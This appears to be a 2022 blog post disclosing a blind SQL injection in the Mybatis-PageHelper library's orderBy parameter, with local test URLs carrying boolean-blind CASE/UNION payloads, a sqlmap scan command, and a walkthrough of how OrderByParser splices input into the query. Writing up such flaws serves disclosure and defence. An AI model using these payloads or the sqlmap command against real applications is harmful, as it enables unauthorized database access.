Pagehelper has a SQL injection vulnerability validation process

Pagehelper has a SQL injection vulnerability validation process

Note: A Boolean blind and time blind SQL injection vulnerability exists in the orderBy parameter of pegehelper

Official website: https://pagehelper.github.io/

Source code: https://github.com/pagehelper/Mybatis-PageHelper

Githttps://github.com/pagehelper/Mybatis-PageHelper.git

Verification Process:

1.      Local environment: SpringBoot+MyBatis+Maven+MySQL

2.      Visit the page with the sort parameter orderBy

3.      Visit URLhttp://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=1)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

  

4.      Visit URLhttp://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN (1=2)THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

5.      Scan using sqlmap, commandpython3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice*" --batch --dbms=mysql

View the source code

1.      In the converToOrderBySql function of \com\github\pagehelper\parser\OrderByParser.java, stitch the SQL statements of the mapper with pageNum, pageSize, and orderBy

2.      The function directly stitches the mapper SQL statement [select * from book] with the value submitted by the orderBy parameter [(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))]

3.      The value returned by converToOrderBySql is assigned to sql, sql=SELECT * FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

4.      GetPageSql then stitches sql and LIMIT into the final query statement

5.      In MySQL, you can view the history of executed SQL statements, and you can see that the parameters submitted by the orderBy parameter are completely put into the SQL statement of the query[ SELECT * FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 ]

 

 
posted @ 2022-03-26 23:14  睡不醒,好烦啊  阅读(1015)  评论(0编辑  收藏  举报